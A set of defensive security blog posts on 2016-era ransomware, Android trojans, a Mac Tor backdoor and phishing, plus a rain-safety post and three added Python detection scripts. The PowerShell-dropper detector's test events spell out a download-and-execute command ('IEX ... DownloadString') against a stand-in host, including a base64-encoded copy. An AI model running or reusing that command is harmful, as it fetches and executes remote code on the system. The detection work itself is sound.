JagerDecryptor-another ransomware

[image: Important_Read_Me.html ransom note]

Another ransomware, JagerDecryptor, has been found. Once it has infected a system, it generates a new AES-256 key for each file it encrypts. That per-file AES key is encrypted with RSA and appended to the end of the file along with the AES IV and other information. Of particular interest, every encrypted file begins with the 4-byte marker “!ENC”, which makes encrypted files easy to identify by content regardless of their name or extension.

Victims are presented with the above file, “Important_Read_Me.html”, as the ransom note, and are asked to email the criminals at smartfiles9@yandex.com.

The following folders are excluded from encryption: Application Data, AppData, Program Files (x86), Program Files, Temp, $Recycle.Bin, System Volume Information, Boot, Windows, ProgramData.

Ranscam doesn’t care if you pay the ransom: it deletes your files anyway

One of the latest pieces of such low-budget malware to come down the pike is called Ranscam. Unlike traditional ransomware, which encrypts a computer’s files and then demands a bitcoin payment, Ranscam infects a computer, deletes the files and then demands a payment from the victim even though the files are already gone and cannot be recovered.

The first thing users see after the malware has found its way onto their system is the ransom note. It looks like the notes shown by other ransomware, but with one seemingly insignificant difference: instead of directing users to an external location where they are supposed to verify the ransom payment, this note shows a clickable button, “I made payment, please verify.”

[image: Ranscam ransom note with the “I made payment, please verify” button]

In reality, the difference is very significant. Whenever a user clicks the button, a message appears saying the payment was not verified and that one file will be deleted each time the button is pressed without the criminals behind Ranscam having been paid. That is presumably meant to make users nervous and persuade them to pay several times, even though the files were deleted at infection time and no payment can bring them back.

There is no way to get back the files deleted by Ranscam; the only way to protect yourself is to be proactive. So we recommend that you don’t open unexpected attachments and don’t follow suspicious links. Not much is known about how Ranscam spreads, but the usual suspects are e-mail attachments and malicious or hacked websites. If you aren’t 100% sure, don’t click.

Back up your data regularly and store the backups on an offline storage device. If some ransomware encrypts or deletes your files, you’re covered.

Use a good security suite such as Max Total Security, which provides antivirus, a firewall and a backup program.

Rain Rain Go Away-Some Tips


Not that we really want the rain to go away: after such a long wait and years of drought we have good rain this year, but we need to be extremely careful indoors as well as outdoors.

Planning ahead:

1. Get weather news: The best way to avoid lightning, flash floods and other dangerous conditions is not to be in danger in the first place. Many sources of weather information are available, such as current forecasts on TV, on the internet or in the newspaper.
2. Inspect your vehicle
Make sure your windshield wipers are working correctly, and replace cracked or worn ones.
3. Allow extra time
Traffic congestion is worse in bad weather. Plan ahead and leave early so you have enough time to get to your destination.
4. Slow down
When it rains, oil and grime on the pavement rise to the surface. Wet streets are extremely slick and slippery, making it more difficult to get traction. When you drive slowly, a greater amount of the tire’s tread makes contact with the road, giving you better traction. Drive at a steady pace and avoid jerky movements when braking, accelerating or turning.
5. Don’t tailgate
It takes three times longer to stop on a wet road than on a dry one. Increase the distance you normally keep from the car in front of you and be alert for brake lights ahead.
6. Downed power lines
If a power line comes into contact with your vehicle while you are inside, STAY in your car. Wait for help to arrive and honk the horn to attract attention. If other imminent dangers force you to leave the vehicle, do NOT touch the vehicle and the ground at the same time. Jump out and land with both feet together, then shuffle or hop with both feet together until you are at least 50 feet away from your car.
7. Don’t take pictures/selfies!
Dying to capture the surreal beauty of that thundercloud or show the folks back home what a haboob looks like? Wait till you’re off the road before you snap that picture. When you’re driving, focus on the road and keep both hands on the wheel.

Indoor Safety

1. Never touch wiring during a thunderstorm. Once thunder can be heard it is too late to unplug electronics.
2. Corded phones are dangerous during thunderstorms. Lightning traveling through telephone wires has killed people. Cell phones and cordless phones are safe.
3. Wait to use any plumbing: sinks, showers, tubs and toilets. Plumbing can conduct electricity from lightning strikes outside.
4. Unplug expensive electronics, including TVs, stereos, home entertainment centers, and computers together with their modem lines, when thunderstorms are expected and before the storm arrives. Typically, summer thunderstorms form in the early to mid-afternoon, when most people are at work.
5. Stop playing video games connected to the TV.

Pokemon GO


The new mobile game “Pokemon Go” has become the hottest iPhone and Android game to hit the market in years, with enormous popularity and massive social impact. The app has taken the world by storm since its launch this week, but it has also played a role in armed robberies in Missouri, the discovery of a body in Wyoming and minor injuries to fans distracted by the app, and, to top it all, malware-infected APKs are circulating too.

The new location-based augmented reality game, developed by Niantic, allows players to catch Pokémon in real life using their device’s camera, and is currently only officially available in the United States, New Zealand, the UK and Australia. Five days after its release the game is on more Android phones than the dating app Tinder or Snapchat, and its rate of daily active users is neck and neck with the social network Twitter, according to analytics firm SimilarWeb.

Due to the huge interest surrounding Pokémon Go, many gaming and tutorial websites have published tutorials recommending that users download the APK from a link outside Google Play. To install such an APK, users have to “side-load” it by changing a core Android security setting to allow installation of apps from “Unknown sources”. That setting is device-wide: once enabled it also removes the protection against any other untrusted package, not just the game.

Researchers discovered an infected Android version of the newly released game [1]. This specific APK was modified to include the remote access tool (RAT) DroidJack (also known as SandroRAT), which gives an attacker virtually full control over a victim’s phone.

A simple way to check whether a device is infected is to inspect the installed application’s permissions: go to Settings → Apps → Pokemon GO and scroll down to the PERMISSIONS section. If the game has asked for permissions such as directly calling phone numbers, reading and editing your SMS messages, recording audio, reading web history, reading and modifying your contacts, reading and writing call logs, or changing network connectivity, uninstall it right away: the legitimate game needs none of these, and the DroidJack-infected version requests them. A permission check is a quick indicator, not proof that a side-loaded APK is clean.
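As an added example (not from the original post or from the researchers who analysed the infected APK), the permission check above can be automated against the output of `adb shell dumpsys package com.nianticlabs.pokemongo`. The script maps the plain-English permissions listed above to Android’s permission constant names, extracts the permissions from a dump, and reports which DroidJack indicators are present. The two dumpsys excerpts are constructed for this example, not captured from real devices, and the “clean” permission list is illustrative only.

```python
import re

# The permissions the infected APK requested, as listed in the post, mapped to the
# standard Android permission names. The legitimate game needs none of these.
DROIDJACK_INDICATORS = {
    "android.permission.CALL_PHONE": "directly call phone numbers",
    "android.permission.READ_SMS": "read your SMS messages",
    "android.permission.WRITE_SMS": "edit your SMS messages",
    "android.permission.RECORD_AUDIO": "record audio",
    "com.android.browser.permission.READ_HISTORY_BOOKMARKS": "read web history",
    "android.permission.READ_CONTACTS": "read your contacts",
    "android.permission.WRITE_CONTACTS": "modify your contacts",
    "android.permission.READ_CALL_LOG": "read call logs",
    "android.permission.WRITE_CALL_LOG": "write call logs",
    "android.permission.CHANGE_NETWORK_STATE": "change network connectivity",
}

# Matches "android.permission.READ_SMS" as well as vendor-prefixed names such as
# "com.android.browser.permission.READ_HISTORY_BOOKMARKS"; stops at ": granted=true".
PERM_RE = re.compile(r"([A-Za-z0-9_.]+\.permission\.[A-Z0-9_]+)")


def parse_permissions(dumpsys_text):
    """Extract the unique permission names from `dumpsys package <pkg>` output."""
    return sorted(set(PERM_RE.findall(dumpsys_text)))


def suspicious_permissions(requested):
    """Return {permission: plain-English reason} for every DroidJack indicator present."""
    return {p: DROIDJACK_INDICATORS[p] for p in requested if p in DROIDJACK_INDICATORS}


def verdict(dumpsys_text):
    """One-line verdict for a dump; absence of indicators is not proof the APK is clean."""
    hits = suspicious_permissions(parse_permissions(dumpsys_text))
    if not hits:
        return "no DroidJack permission indicators (not proof the APK is clean)"
    return "UNINSTALL: game requests permissions to " + ", ".join(sorted(hits.values()))


# Constructed excerpts in the shape of dumpsys output (not real device dumps).
CLEAN_DUMP = """\
  Package [com.nianticlabs.pokemongo] (1a2b3c):
    requested permissions:
      android.permission.INTERNET
      android.permission.ACCESS_FINE_LOCATION
      android.permission.CAMERA
      android.permission.ACCESS_NETWORK_STATE
    install permissions:
      android.permission.INTERNET: granted=true
"""

INFECTED_DUMP = """\
  Package [com.nianticlabs.pokemongo] (9f8e7d):
    requested permissions:
      android.permission.INTERNET
      android.permission.ACCESS_FINE_LOCATION
      android.permission.CAMERA
      android.permission.READ_SMS
      android.permission.RECORD_AUDIO
      android.permission.READ_CALL_LOG
      android.permission.CALL_PHONE
      com.android.browser.permission.READ_HISTORY_BOOKMARKS
    install permissions:
      android.permission.READ_SMS: granted=true
"""

if __name__ == "__main__":
    print("clean   :", verdict(CLEAN_DUMP))
    print("infected:", verdict(INFECTED_DUMP))
```

To use it on a real device, pipe `adb shell dumpsys package com.nianticlabs.pokemongo` into `verdict()`. The indicator list is deliberately a denylist of capabilities the game has no business asking for, so a repackaged APK that drops one or two of them still trips the check.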

Bottom line: just because you can get the latest software on your device does not mean that you should. Downloading applications only from legitimate app stores is the best way to avoid compromising your device and the networks it accesses.

HummingBad Android malware: is your device infected?


The same group of cybercriminals behind a strain of iOS malware uncovered last year has apparently diversified and now dabbles in Android malware. The group, dubbed Yingmob, runs a malware campaign named HummingBad that controls 10 million Android devices globally and rakes in an estimated $300,000 a month.

Researchers revealed that a Chinese advertising company had created one of the most pernicious pieces of Android malware yet; they estimate it has infected 10 million Android handsets worldwide. Be on your guard: once it has root, HummingBad can do virtually anything the attacker wants, from spying on your personal information to stealing your bank login details.

The main purpose of HummingBad is to trick users into clicking on mobile and web ads, which generates advertising revenue for its parent company, Yingmob, a practice known as “click fraud”. It is a lot like the browser toolbars designed to deliver ads to your computer a decade ago.

The malware attempts to root hundreds of devices daily; sometimes the rooting fails, but often it succeeds. As far as the ad fraud campaign goes, it does it all: HummingBad displays more than 20 million ads per day, generates more than 2.5 million clicks per day and installs more than 50,000 bogus apps per day.

Because the malware gains “root access” to Android, the very heart of the phone’s operating system, and then calls home to a server controlled by Yingmob, it could be used to do virtually anything the attacker wants, from spying on your personal information to stealing your bank login details. Even if the creators only use it for click fraud today, they could decide to sell the rootkit, or access to the rooted devices, on the black market.

Most people were probably infected because they installed a less-than-hygienic app from a third-party Android store or website. The vast majority of the 10 million infected handsets are in China and India, which points to third-party app stores, far more popular there, as the most likely source. But around 250,000 are in the US, which could be people travelling from Asia or simply people who ignored Android’s default settings and allowed app installs from third-party sites.

You need to install a good mobile security product for Android, such as Max Total Security - Android, to detect this malware and protect the device from other malware.

Cyber Criminals Using Rio Olympics to Target Users with Phishing Scams


The Olympics are right around the corner, and the world will turn its attention to Rio de Janeiro for the Games of the XXXI Olympiad, better known as the Rio Summer Olympics. Unfortunately, cybercriminals know this and are getting ready for the Olympics as well. Scammers are registering domains that contain the terms “Rio” and “rio2016”. They are also buying low-cost SSL certificates so that their fake websites show the browser padlock and appear authentic and trusted; a valid certificate only proves the connection is encrypted, not that the site belongs to who it claims. Phishing websites imitating ticket sale services have so far been the most effective of the scams directed at users.

It’s not only end users who are targets of these phishing attacks. Brazil tops the list as the country most attacked with this type of scam, and employees of the Games organization were also targeted for their potentially lucrative credentials. As happened during the last World Cup, most of the malicious e-mails sent by Brazilian criminals used free tickets to watch the Games in Rio as the bait; some of these messages also pointed to fake websites. One well-crafted campaign promised direct sales of tickets with no need to enter the official ticket lotteries held for people living in Brazil.

We warn readers to be careful not to fall for such scams, and to expect an increase in scam e-mails as the Rio Olympics gear up in August 2016.

New Malware Uses Tor to Open Backdoor on Mac OS X Systems

The malware’s technical name is Backdoor.MAC.Eleanor, and its creators are currently distributing it to victims as EasyDoc Converter, a Mac app that supposedly lets users convert files by dragging them onto a small window.

Backdoor.MAC.Eleanor runs a Tor hidden service on your Mac. The Tor service automatically connects the infected computer to the Tor network and generates a .onion address through which the attacker can reach the system using only a Tor-enabled browser, with no inbound port or public IP needed on the victim’s side.

A bundled PHP web service is the receiving end of that connection; it also translates the commands it receives from the crook’s control panel into actions on the local Mac operating system.

The backdoor provides many remote management options. Additionally, the attackers can list locally running apps, use the infected computer to send e-mails, use it as an intermediary to connect to and administer databases, and scan remote firewalls for open ports.

The infected computer basically becomes a bot in the crook’s botnet, which can at any time be used to send out massive spam campaigns, steal sensitive data from the infected system, take part in DDoS attacks or install other malware.

Below is an image of what the crook sees when accessing your Mac’s Tor .onion link.

[image: attacker’s web control panel as seen over the Mac’s .onion address]

The application name is EasyDoc Converter.app, and its advertised function is to convert documents, but it does anything but that. Instead, it silently installs a backdoor that gives the attacker full access to the operating system: a file explorer, shell execution, webcam image and video capture, and more. The application is built with Platypus, a tool for wrapping shell, Perl, Python or Ruby scripts as native Mac apps (http://sveinbjorn.org/platypus).


MIRCOP Crypto-Ransomware

The MIRCOP ransomware is distributed as a malicious document in spam e-mails, supposedly a Thai customs form used when importing or exporting goods. The document asks users to enable macros in order to “sign” it; the macro instead abuses Windows PowerShell to download and execute the malicious payload.
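The infection chain just described (a macro in an Office document launching PowerShell, which downloads and runs the payload) shows up in endpoint telemetry as a single process-creation event: an Office application as the parent, powershell.exe as the child, and download/execute cues on the command line. The detection logic below is an added example, not from the original post or from the researchers who analysed MIRCOP. The events are constructed in the shape of Sysmon process-creation fields, the regular expressions and the set of Office hosts are ours, and the encoded-command sample is generated in place so that the decode step can be shown.

```python
import base64
import re

# Office applications that host VBA macros. WINWORD.EXE covers the .doc described
# above; the others are assumed siblings worth covering with the same rule.
OFFICE_HOSTS = {"winword.exe", "excel.exe", "powerpnt.exe"}
SHELLS = {"powershell.exe", "pwsh.exe"}

# Command-line cues for "download and execute". These patterns are ours, not from the report.
CUES = {
    "download": re.compile(r"downloadstring|downloadfile|net\.webclient|invoke-webrequest|\biwr\b|bitsadmin", re.I),
    "execute": re.compile(r"\biex\b|invoke-expression|start-process", re.I),
    "evasion": re.compile(r"-enc(odedcommand)?\b|-w(indowstyle)?\s+hidden|-nop\b|executionpolicy\s+bypass|-ep\s+bypass", re.I),
}
ENC_RE = re.compile(r"-enc(?:odedcommand)?\s+([A-Za-z0-9+/=]+)", re.I)


def basename(image_path):
    """Lower-cased file name from a Windows or POSIX path."""
    return image_path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def expand_encoded(cmd):
    """-EncodedCommand carries base64 of UTF-16LE script; append the decoded text so the
    download/execute cues can still be matched. Returns cmd unchanged if nothing decodes."""
    m = ENC_RE.search(cmd)
    if not m:
        return cmd
    try:
        decoded = base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return cmd
    return cmd + " " + decoded


def analyse(event):
    """Return the reasons a process-creation event looks like a macro-driven PowerShell
    dropper, or [] if it does not. `event` uses Sysmon-style field names."""
    parent = basename(event["ParentImage"])
    child = basename(event["Image"])
    if child not in SHELLS:
        return []
    reasons = []
    if parent in OFFICE_HOSTS:
        reasons.append(f"{parent} spawned {child}")
    cmd = expand_encoded(event.get("CommandLine", ""))
    reasons += [f"{name} cue" for name, rx in CUES.items() if rx.search(cmd)]
    # An Office parent is enough on its own. For any other parent require a download
    # cue plus at least one more cue, so routine admin PowerShell does not alert.
    if parent in OFFICE_HOSTS or ("download cue" in reasons and len(reasons) >= 2):
        return reasons
    return []


def detect(events):
    """Return [(index, reasons)] for every event that analyse() flags."""
    hits = []
    for i, event in enumerate(events):
        reasons = analyse(event)
        if reasons:
            hits.append((i, reasons))
    return hits


# Constructed events in the shape of Sysmon Event ID 1 fields (not real telemetry).
ENCODED_PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/p.ps1')"
EVENTS = [
    {   # the chain described above: Word macro -> PowerShell -> download -> execute
        "ParentImage": r"C:\Program Files\Microsoft Office\Office15\WINWORD.EXE",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": "powershell.exe -nop -w hidden -ep bypass -c "
                       "\"IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/p.ps1')\"",
    },
    {   # an administrator running PowerShell interactively from Explorer: no alert
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": "powershell.exe Get-ChildItem C:\\Users",
    },
    {   # Word spawning the print spooler helper: an Office child, but not a shell
        "ParentImage": r"C:\Program Files\Microsoft Office\Office15\WINWORD.EXE",
        "Image": r"C:\Windows\splwow64.exe",
        "CommandLine": "splwow64.exe 12288",
    },
    {   # the same payload hidden behind -EncodedCommand, launched from a non-Office parent
        "ParentImage": r"C:\Windows\System32\svchost.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": "powershell -EncodedCommand "
                       + base64.b64encode(ENCODED_PAYLOAD.encode("utf-16-le")).decode(),
    },
]

if __name__ == "__main__":
    for index, reasons in detect(EVENTS):
        print(f"event {index}: {'; '.join(reasons)}")
```

The rule fires on events 0 and 3 and stays quiet on 1 and 2. The decode step matters: without it, the fourth event shows only an “evasion cue” and the download and execute cues are invisible to the regexes.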

The following screen is shown to the victim, accusing the victim of having stolen 48.48 BTC from a hacktivist group.

[image: MIRCOP ransom note]

In addition to encrypting files on the infected machine, researchers discovered that MIRCOP can steal credentials from various applications, including Mozilla Firefox, Google Chrome, Opera, FileZilla and Skype. Users should be careful when receiving mail from unknown sources and should refrain from downloading and opening any attachments.

MIRCOP demands a ransom of 48.48 bitcoins (about US$28,730 as of June 23, 2016), which is among the highest demands we have seen. At the end of the note the author leaves a bitcoin address. Unlike other ransom notes that walk victims step by step through the payment, MIRCOP assumes the victim is already familiar with making bitcoin transactions.

RockLoader Delivers New Bart Encryption Ransomware

A new ransomware named Bart is spreading. Rather than implementing its own file encryption, Bart uses third-party compression software to pack each victim file into a password-protected ZIP archive and appends the extension “.bart.zip”. It appears to be spread by the same vectors as Locky and to mimic Locky’s note and payment portal.

The following ransom note is displayed, and is also saved to the desktop as “recovery.txt”.

[image: Bart ransom note recovery.txt]

The messages in this campaign had the subject “Photos” and an attachment named “photos.zip”, “image.zip”, “Photos.zip”, “photo.zip”, “Photo.zip” or “picture.zip”. The zip files contained a JavaScript file such as “PDF_123456789.js”, the first stage of the RockLoader chain that delivers Bart.

[image: Bart spam e-mail with the photos.zip attachment]

Files are encrypted similar to files below:

[image: directory listing of files renamed with the .bart.zip extension]

The ransom note urges the user to visit a payment portal and pay 3 bitcoins (just under $2,000 at current exchange rates). The payment portal is similar to the one used by Locky. By harnessing the skill and judgment of empowered users, an organization can bolster its defenses against malware delivered via phishing e-mail.
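The following is an added example, not from the original post, that turns the file-level indicators from two items on this page into one content-based check: JagerDecryptor’s “!ENC” marker in the first four bytes (see the JagerDecryptor item at the top of the page), Bart’s output as a password-protected ZIP renamed “.bart.zip”, and the “photos.zip” attachment carrying a JavaScript file named like “PDF_123456789.js”. File names and contents are constructed; the script extensions beside .js are our assumption; and because Python’s zipfile cannot write password-protected archives, the fixture flips the ZIP “encrypted” flag bit by hand, as explained in the code.

```python
import io
import os
import tempfile
import zipfile

JAGER_MAGIC = b"!ENC"   # first 4 bytes of every JagerDecryptor-encrypted file
ZIP_ENCRYPTED = 0x1     # ZIP general-purpose flag bit 0: entry is password-protected
# The post names .js; the other script extensions are assumed siblings a mail gateway would also flag.
SCRIPT_EXTS = (".js", ".jse", ".wsf", ".vbs", ".vbe")


def triage(name, data):
    """Classify a file by its content, not by its name alone. Returns one of
    'jager-encrypted', 'bart-encrypted', 'script-dropper-zip', 'zip' or 'other'."""
    if data[:4] == JAGER_MAGIC:
        return "jager-encrypted"
    if not zipfile.is_zipfile(io.BytesIO(data)):
        return "other"
    infos = zipfile.ZipFile(io.BytesIO(data)).infolist()
    # Bart: the original file sits inside a password-protected archive named <file>.bart.zip.
    # The name alone is not enough; every entry must carry the encrypted flag.
    all_protected = bool(infos) and all(i.flag_bits & ZIP_ENCRYPTED for i in infos)
    if name.lower().endswith(".bart.zip") and all_protected:
        return "bart-encrypted"
    # Spam attachment: a "photos" zip whose payload is a script rather than pictures.
    if any(i.filename.lower().endswith(SCRIPT_EXTS) for i in infos):
        return "script-dropper-zip"
    return "zip"


def scan_tree(root):
    """Walk a directory tree and return (path, verdict) for anything worth a look."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for fname in files:
            path = os.path.join(dirpath, fname)
            with open(path, "rb") as fh:
                verdict = triage(fname, fh.read())
            if verdict not in ("other", "zip"):
                findings.append((path, verdict))
    return sorted(findings)


def make_zip(entries, mark_encrypted=False):
    """Build an in-memory ZIP (STORED, so no 'PK' signatures can appear inside compressed data).

    zipfile cannot write password-protected archives, so to imitate Bart's output the fixture
    sets flag bit 0 in every local file header (signature 50 4B 03 04, flags at offset 6) and
    central directory header (signature 50 4B 01 02, flags at offset 8) after writing. Real Bart
    archives come from a real archiver with a real password; the flag is all that triage() reads.
    """
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_STORED) as zf:
        for entry_name, content in entries.items():
            zf.writestr(entry_name, content)
    raw = bytearray(buf.getvalue())
    if mark_encrypted:
        for sig, off in ((b"PK\x03\x04", 6), (b"PK\x01\x02", 8)):
            pos = raw.find(sig)
            while pos != -1:
                raw[pos + off] |= ZIP_ENCRYPTED
                pos = raw.find(sig, pos + 4)
    return bytes(raw)


# Constructed samples (not real malware output).
SAMPLES = {
    "report.docx": JAGER_MAGIC + b"\x00" * 48 + b"<rsa-wrapped key, iv, metadata>",
    "budget.xlsx.bart.zip": make_zip({"budget.xlsx": b"spreadsheet bytes"}, mark_encrypted=True),
    "photos.zip": make_zip({"PDF_123456789.js": b"// inert placeholder for a JS downloader"}),
    "holiday.zip": make_zip({"IMG_0001.jpg": b"\xff\xd8\xff\xe0 jpeg bytes"}),
    "notes.txt": b"plain text, nothing to see",
}


def triage_all(samples):
    return {name: triage(name, data) for name, data in samples.items()}


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as root:
        for name, data in SAMPLES.items():
            with open(os.path.join(root, name), "wb") as fh:
                fh.write(data)
        for path, verdict in scan_tree(root):
            print(f"{verdict:20s} {os.path.basename(path)}")
```

Run against a suspect share, `scan_tree()` reports the three interesting classes and stays quiet on ordinary zips and other files. Checking the Jager marker needs only the first four bytes, which is why the marker is a cheaper and more reliable indicator than any renamed extension; for Bart the extension and the encrypted flag are checked together, so an unrelated file that happens to be called something.bart.zip is not misreported.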

Overlay Malware spreading via SMS phishing in Europe on Android devices

Overlay malware is a criminal’s Swiss Army knife: flexible and effective at stealing financial credentials as well as many other types of sensitive data from an Android device. Overlay malware botnets are expected to proliferate because of the malware’s proven ability to steal financial credentials alongside other authentication and customer data from mobile devices.

Threat actors typically first set up the command and control (C2) servers and malware hosting sites, then place the malware apps on the hosting sites and send victims SMS messages with an embedded link that leads to the malware app. Once on the device, the malware launches a process that monitors which app is running in the foreground. When the user brings a targeted benign app (such as a banking app) to the foreground, the malware draws a phishing view on top of it. The unwary user, believing they are still in the benign app, enters their account credentials, which are then sent to the C2 servers controlled by the threat actors.

Smishing (SMS phishing) offers a unique vector to infect mobile users. The latest Smishing campaigns spreading in Europe show that Smishing is still a popular means for threat actors to distribute their malware. In addition, threat actors have been using diversified host schemes and different C2 servers, and have been continuously refining their malicious code to keep infecting more users and evade detection.

To protect against these threats, users should not install apps from outside official app stores and should take care before clicking any link whose origin is unclear. Overlays also depend on the malicious app being allowed to draw over other apps, so a freshly installed app that asks for that capability without an obvious reason deserves suspicion.